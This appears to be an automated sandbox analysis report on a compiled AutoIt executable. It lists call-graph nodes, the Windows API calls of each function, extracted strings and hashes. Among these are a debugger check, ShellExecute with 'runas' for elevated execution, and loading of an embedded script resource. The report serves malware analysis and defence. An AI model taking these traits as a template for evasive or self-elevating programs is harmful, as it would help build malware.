99170 7ff643966d39 99170->99133 99218 7ff643967078 99172->99218 99175 7ff6439673bc 99250 7ff6439555b4 15 API calls _mbstowcs_s_l 99175->99250 99176 7ff6439673d3 99238 7ff64395e418 99176->99238 99180 7ff6439673f7 CreateFileW 99182 7ff6439674eb GetFileType 99180->99182 99183 7ff643967469 99180->99183 99181 7ff6439673df 99252 7ff6439555b4 15 API calls _mbstowcs_s_l 99181->99252 99187 7ff643967549 99182->99187 99188 7ff6439674f8 GetLastError 99182->99188 99186 7ff6439674b8 GetLastError 99183->99186 99190 7ff643967478 CreateFileW 99183->99190 99254 7ff643955564 15 API calls 2 library calls 99186->99254 99257 7ff64395e334 16 API calls 2 library calls 99187->99257 99255 7ff643955564 15 API calls 2 library calls 99188->99255 99189 7ff6439673e4 99253 7ff6439555d4 15 API calls _mbstowcs_s_l 99189->99253 99190->99182 99190->99186 99194 7ff6439673c1 99251 7ff6439555d4 15 API calls _mbstowcs_s_l 99194->99251 99195 7ff643967507 CloseHandle 99195->99194 99197 7ff643967539 99195->99197 99256 7ff6439555d4 15 API calls _mbstowcs_s_l 99197->99256 99198 7ff643967568 99200 7ff6439675b5 99198->99200 99258 7ff643967284 67 API calls 2 library calls 99198->99258 99205 7ff6439675ec 99200->99205 99259 7ff643966de4 67 API calls 4 library calls 99200->99259 99201 7ff64396753e 99201->99194 99204 7ff6439675e8 99204->99205 99206 7ff6439675fe 99204->99206 99260 7ff6439604b8 99205->99260 99208 7ff643966d95 99206->99208 99209 7ff643967681 CloseHandle CreateFileW 99206->99209 99208->99170 99217 7ff64395e3f4 LeaveCriticalSection 99208->99217 99210 7ff6439676cb GetLastError 99209->99210 99211 7ff6439676f9 99209->99211 99275 7ff643955564 15 API calls 2 library calls 99210->99275 99211->99208 99213 7ff6439676d8 99276 7ff64395e548 16 API calls 2 library calls 99213->99276 99215->99166 99216->99170 99219 7ff6439670a4 99218->99219 99227 7ff6439670be 99218->99227 99220 7ff6439555d4 _mbstowcs_s_l 15 API calls 99219->99220 99219->99227 99221 7ff6439670b3 99220->99221 99222 7ff64395b164 
_invalid_parameter_noinfo 31 API calls 99221->99222 99222->99227 99223 7ff64396718c 99225 7ff643952554 31 API calls 99223->99225 99236 7ff6439671ec 99223->99236 99224 7ff64396713b 99224->99223 99226 7ff6439555d4 _mbstowcs_s_l 15 API calls 99224->99226 99228 7ff6439671e8 99225->99228 99229 7ff643967181 99226->99229 99227->99224 99230 7ff6439555d4 _mbstowcs_s_l 15 API calls 99227->99230 99231 7ff64396726b 99228->99231 99228->99236 99232 7ff64395b164 _invalid_parameter_noinfo 31 API calls 99229->99232 99233 7ff643967130 99230->99233 99234 7ff64395b184 _isindst 16 API calls 99231->99234 99232->99223 99235 7ff64395b164 _invalid_parameter_noinfo 31 API calls 99233->99235 99237 7ff643967280 99234->99237 99235->99224 99236->99175 99236->99176 99239 7ff64395b9bc _isindst EnterCriticalSection 99238->99239 99246 7ff64395e43b 99239->99246 99240 7ff64395e487 99242 7ff64395ba10 _isindst LeaveCriticalSection 99240->99242 99241 7ff64395e464 99243 7ff64395e170 16 API calls 99241->99243 99244 7ff64395e52a 99242->99244 99245 7ff64395e469 99243->99245 99244->99180 99244->99181 99245->99240 99248 7ff64395e310 wprintf EnterCriticalSection 99245->99248 99246->99240 99246->99241 99247 7ff64395e4c2 EnterCriticalSection 99246->99247 99247->99240 99249 7ff64395e4d1 LeaveCriticalSection 99247->99249 99248->99240 99249->99246 99250->99194 99251->99208 99252->99189 99253->99194 99254->99194 99255->99195 99256->99201 99257->99198 99258->99200 99259->99204 99261 7ff64395e604 31 API calls 99260->99261 99263 7ff6439604cc 99261->99263 99262 7ff6439604d2 99264 7ff64395e548 16 API calls 99262->99264 99263->99262 99266 7ff64395e604 31 API calls 99263->99266 99274 7ff64396050c 99263->99274 99265 7ff643960534 99264->99265 99268 7ff643960560 99265->99268 99271 7ff643955564 fread_s 15 API calls 99265->99271 99269 7ff6439604ff 99266->99269 99267 7ff64395e604 31 API calls 99270 7ff643960518 CloseHandle 99267->99270 99268->99208 99272 7ff64395e604 31 API calls 99269->99272 99270->99262 99273 7ff643960525 
GetLastError 99270->99273 99271->99268 99272->99274 99273->99262 99274->99262 99274->99267 99275->99213 99276->99211 99278 7ff643926d2c LoadLibraryA 99277->99278 99279 7ff643926ce3 99277->99279 99278->99279 99280 7ff643926d41 GetProcAddress 99278->99280 99279->99096 99279->99099 99280->99279 99281->99110 99285 7ff643954c7c 99282->99285 99286 7ff64392680a 99285->99286 99287 7ff643954ca6 99285->99287 99286->99120 99287->99286 99288 7ff643954cd7 99287->99288 99289 7ff643954cb5 fread_s 99287->99289 99300 7ff64394df54 EnterCriticalSection 99288->99300 99298 7ff6439555d4 15 API calls _mbstowcs_s_l 99289->99298 99293 7ff643954cca 99299 7ff64395b164 31 API calls _invalid_parameter_noinfo 99293->99299 99298->99293 99299->99286 99304 7ff6439547bc 99301->99304 99303 7ff6439a2210 99303->99122 99307 7ff643954724 99304->99307 99308 7ff643954746 99307->99308 99309 7ff643954732 99307->99309 99311 7ff643954742 99308->99311 99317 7ff64395bef8 6 API calls __crtLCMapStringW 99308->99317 99315 7ff6439555d4 15 API calls _mbstowcs_s_l 99309->99315 99311->99303 99313 7ff643954737 99316 7ff64395b164 31 API calls _invalid_parameter_noinfo 99313->99316 99315->99313 99316->99311 99317->99311 99319 7ff643931a48 99318->99319 99320 7ff643931c5f 99318->99320 99325 7ff643931a90 99319->99325 99335 7ff643945114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 99319->99335 99320->98998 99325->98998 99330 7ff64392f1ce 99329->99330 99332 7ff64392f1d8 99329->99332 99331 7ff643931a30 45 API calls 99330->99331 99331->99332 99332->99008 99333->99006 99334->99002 99336->99021 99337->99026 99338->99020 99339->99028 99340->99031 99341->99041 99342->99040 99344 7ff6439a2bae 99343->99344 99345 7ff6439a29da 99344->99345 99346 7ff6439267d8 45 API calls 99344->99346 99347 7ff6439a240c 32 API calls 99344->99347 99345->99047 99345->99048 99346->99344 99347->99344 99349 7ff6439a1d61 99348->99349 99350 7ff6439a1d71 99348->99350 99351 7ff6439548e0 89 API calls 
99349->99351 99352 7ff6439a1dbf 99350->99352 99353 7ff6439548e0 89 API calls 99350->99353 99369 7ff6439a1d7a 99350->99369 99351->99350 99375 7ff6439a2038 99352->99375 99355 7ff6439a1d9e 99353->99355 99355->99352 99357 7ff6439a1da7 99355->99357 99356 7ff6439a1df5 99358 7ff6439a1df9 99356->99358 99359 7ff6439a1e1c 99356->99359 99357->99369 99387 7ff643954970 99357->99387 99361 7ff6439a1e07 99358->99361 99362 7ff643954970 62 API calls 99358->99362 99363 7ff6439a1e4a 99359->99363 99364 7ff6439a1e2a 99359->99364 99365 7ff643954970 62 API calls 99361->99365 99361->99369 99362->99361 99379 7ff6439a1e88 99363->99379 99367 7ff643954970 62 API calls 99364->99367 99368 7ff6439a1e38 99364->99368 99365->99369 99367->99368 99368->99369 99370 7ff643954970 62 API calls 99368->99370 99369->99047 99370->99369 99371 7ff6439a1e52 99372 7ff6439a1e68 99371->99372 99373 7ff643954970 62 API calls 99371->99373 99372->99369 99374 7ff643954970 62 API calls 99372->99374 99373->99372 99374->99369 99376 7ff6439a2056 memcpy_s 99375->99376 99377 7ff6439a2069 99375->99377 99376->99356 99378 7ff643954c5c _fread_nolock 45 API calls 99377->99378 99378->99376 99380 7ff6439a1fb0 99379->99380 99385 7ff6439a1eaa 99379->99385 99383 7ff6439a1fd3 99380->99383 99401 7ff643952a04 60 API calls 2 library calls 99380->99401 99382 7ff6439a1bd0 45 API calls 99382->99385 99383->99371 99385->99380 99385->99382 99385->99383 99385->99385 99399 7ff6439a1c9c 45 API calls 99385->99399 99400 7ff6439a20cc 60 API calls 99385->99400 99388 7ff6439549a3 99387->99388 99389 7ff64395498e 99387->99389 99398 7ff64395499e 99388->99398 99402 7ff64394df54 EnterCriticalSection 99388->99402 99403 7ff6439555d4 15 API calls _mbstowcs_s_l 99389->99403 99391 7ff643954993 99404 7ff64395b164 31 API calls _invalid_parameter_noinfo 99391->99404 99394 7ff6439549b9 99395 7ff6439548ec 60 API calls 99394->99395 99396 7ff6439549c2 99395->99396 99397 7ff64394df60 fread_s LeaveCriticalSection 99396->99397 99397->99398 99398->99369 99399->99385 

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF643923785), ref: 00007FF6439237F2
                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF643923785), ref: 00007FF643923807
                                                                      • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF643923785), ref: 00007FF64392388D
                                                                        • Part of subcall function 00007FF643923F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF6439238BF,?,?,?,?,?,00007FF643923785), ref: 00007FF643923FFD
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF643923785), ref: 00007FF643923924
                                                                      • MessageBoxA.USER32 ref: 00007FF64396B888
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF643923785), ref: 00007FF64396B8E1
                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,00007FF643923785), ref: 00007FF64396B968
                                                                      • ShellExecuteW.SHELL32 ref: 00007FF64396B98F
                                                                        • Part of subcall function 00007FF643923B84: GetSysColorBrush.USER32 ref: 00007FF643923B9E
                                                                        • Part of subcall function 00007FF643923B84: LoadCursorW.USER32 ref: 00007FF643923BAE
                                                                        • Part of subcall function 00007FF643923B84: LoadIconW.USER32 ref: 00007FF643923BC3
                                                                        • Part of subcall function 00007FF643923B84: LoadIconW.USER32 ref: 00007FF643923BDC
                                                                        • Part of subcall function 00007FF643923B84: LoadIconW.USER32 ref: 00007FF643923BF5
                                                                        • Part of subcall function 00007FF643923B84: LoadImageW.USER32 ref: 00007FF643923C21
                                                                        • Part of subcall function 00007FF643923B84: RegisterClassExW.USER32 ref: 00007FF643923C85
                                                                        • Part of subcall function 00007FF643923CBC: CreateWindowExW.USER32 ref: 00007FF643923D0C
                                                                        • Part of subcall function 00007FF643923CBC: CreateWindowExW.USER32 ref: 00007FF643923D5F
                                                                        • Part of subcall function 00007FF643923CBC: ShowWindow.USER32 ref: 00007FF643923D75
                                                                        • Part of subcall function 00007FF643926258: Shell_NotifyIconW.SHELL32 ref: 00007FF643926350
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                      • String ID: This is a third-party compiled AutoIt script.$runas
                                                                      • API String ID: 1593035822-3287110873
                                                                      • Opcode ID: 3952ebee020ff551dd9b970e0e86bf8aed240aa896a8a003d38d5c5607345415
                                                                      • Instruction ID: 6aa65847c1563b5944e22c0de8f3a4b4e7bf6c0cd41d05c4fb1f7d9dd6f61b3c
                                                                      • Opcode Fuzzy Hash: 3952ebee020ff551dd9b970e0e86bf8aed240aa896a8a003d38d5c5607345415
                                                                      • Instruction Fuzzy Hash: 20716A21A1DA8395FA20FB21E9831F86760BF51344F801532E54DE62ABFF3CE649E710

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                      • String ID: AU3!$EA06$SCRIPT
                                                                      • API String ID: 3051347437-2925976212
                                                                      • Opcode ID: 8a3c5553b4e00065fee7198aeb753497d16f6c8843a83ea9b593933600f15c67
                                                                      • Instruction ID: fffd94a6076f92e6b37e962daf6ef3fdba6ccff34372b548af3cc0f8382d9983
                                                                      • Opcode Fuzzy Hash: 8a3c5553b4e00065fee7198aeb753497d16f6c8843a83ea9b593933600f15c67
                                                                      • Instruction Fuzzy Hash: 5F911172B0EA4186FB20BB21E546ABC27A4BB45B84F454535DE5DE7B86EF78E404E300

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentInfoSystemVersionWow64
                                                                      • String ID: |O
                                                                      • API String ID: 1568231622-607156228
                                                                      • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                      • Instruction ID: 86efce04ce56cdf1359c4734417e136cdc15e90464973e715652feb651494de7
                                                                      • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                      • Instruction Fuzzy Hash: 8AD19131AAD2E285FA20FB14A8531753F90AF61784F44007AD59DE26A7FF6CB181F721

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 1787492119-0
                                                                      • Opcode ID: e2a7c1d8124437b582cfb658b2d177abad3ac019b1a970ee0b5f7319356aeb95
                                                                      • Instruction ID: 4133de334e8f463ba58a54aeb9960e4f757eecf46ea6ab0e36e5ba4eea7f095e
                                                                      • Opcode Fuzzy Hash: e2a7c1d8124437b582cfb658b2d177abad3ac019b1a970ee0b5f7319356aeb95
                                                                      • Instruction Fuzzy Hash: 2CE19022A0CB4186EB14FF26D5521BD67A0FB84B88F044535DE5EEB7AAEF38E405D700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                      • String ID:
                                                                      • API String ID: 2695905019-0
                                                                      • Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                      • Instruction ID: fd498619a594fe09b4f13275761684c6b3613df363868a8ce82e67661ca2f5cf
                                                                      • Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                      • Instruction Fuzzy Hash: 7DF05E90E0C602C2EA64BB25AC0B3386260AF51BB6F544330D47ED66E5EF6C94986B00

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                      • API String ID: 2667193904-1575078665
                                                                      • Opcode ID: f9406fba147e09617d77f46eeb912367f4a34daf77c80b7912a24e0bdb708ac2
                                                                      • Instruction ID: e56dffd417b00d821f73c21a3353a6f52d0075a184d6bb289e3bf3d7918431d1
                                                                      • Opcode Fuzzy Hash: f9406fba147e09617d77f46eeb912367f4a34daf77c80b7912a24e0bdb708ac2
                                                                      • Instruction Fuzzy Hash: EE916E32A1CA8685EB20FB24E8421BD7364FF94784F801136E54CE3AA6EF7CE145E750

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                      • String ID: TaskbarCreated
                                                                      • API String ID: 129472671-2362178303
                                                                      • Opcode ID: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                      • Instruction ID: 7a60895c587b6a3c63cedddf432d9e9db3f2fe2c1c06c200787e155ea82c05af
                                                                      • Opcode Fuzzy Hash: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                      • Instruction Fuzzy Hash: CD51AD31D4CA5391FAA0BB24EA472B9AA50AF55B40F440831E44EF26E7EF6CF544BB14

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-2659433951
                                                                      • Opcode ID: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                      • Instruction ID: ead6d56a329875b81292e1a3a3b93aa66c6fd5607e460bfe45387d06312ffd59
                                                                      • Opcode Fuzzy Hash: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                      • Instruction Fuzzy Hash: BA314736A08B119AF740EF61E8463A93BB4FB54748F500139CA8DA7B64EF7CD198DB50

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                      • String ID: close all
                                                                      • API String ID: 1992507300-3243417748
                                                                      • Opcode ID: 898e7ad48959ea57d970830a0d3bf25c9db69e83af24dfb35c39e817a9ff6a77
                                                                      • Instruction ID: 4cdb6c70b64b27ea63cae51b52f50e3f842f0b5dfdc31210bb3fe7e46aba2f26
                                                                      • Opcode Fuzzy Hash: 898e7ad48959ea57d970830a0d3bf25c9db69e83af24dfb35c39e817a9ff6a77
                                                                      • Instruction Fuzzy Hash: 5BE11D66B1D94281EE58FB16C5522BC2360BF98B44F544435DB4EF7693EF3CE862A700

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                      • String ID: AutoIt v3
                                                                      • API String ID: 423443420-1704141276
                                                                      • Opcode ID: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                      • Instruction ID: e890a1be08c59c0454af252d41e8b3cf4d9c8f2dfb129aebe1bdfc8ace54e386
                                                                      • Opcode Fuzzy Hash: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                      • Instruction Fuzzy Hash: C0311636A0CB12DAEB40FB91F8863A93774BB88755F044439C98DA3B15EF7CD094A750

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                      • String ID:
                                                                      • API String ID: 1617910340-0
                                                                      • Opcode ID: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                      • Instruction ID: 7eccb504166c912c9f91a872712328b4fb72a37eecef12a76cf7ee68fba7279e
                                                                      • Opcode Fuzzy Hash: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                      • Instruction Fuzzy Hash: D0C1D033B19A418AEB50EF64D4823AC3761E749BA8F005235DE2EEB796EF38D055D740

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
                                                                      • String ID:
                                                                      • API String ID: 3249950245-0
                                                                      • Opcode ID: c98894d22354e7b9f6123bf715ce3834dde4ed65d192f2dc08ca791b65f211be
                                                                      • Instruction ID: 8ca3f1b1203dca7487b16743742c1b0956ea906428a89c4977d5f0b60b20decd
                                                                      • Opcode Fuzzy Hash: c98894d22354e7b9f6123bf715ce3834dde4ed65d192f2dc08ca791b65f211be
                                                                      • Instruction Fuzzy Hash: 18228272A0C68286FB68FB24D4463B967A0FB45744F144136DA8DE7AD6EF3CE441E700

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 849 7ff643923cbc-7ff643923d88 CreateWindowExW * 2 ShowWindow * 2
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
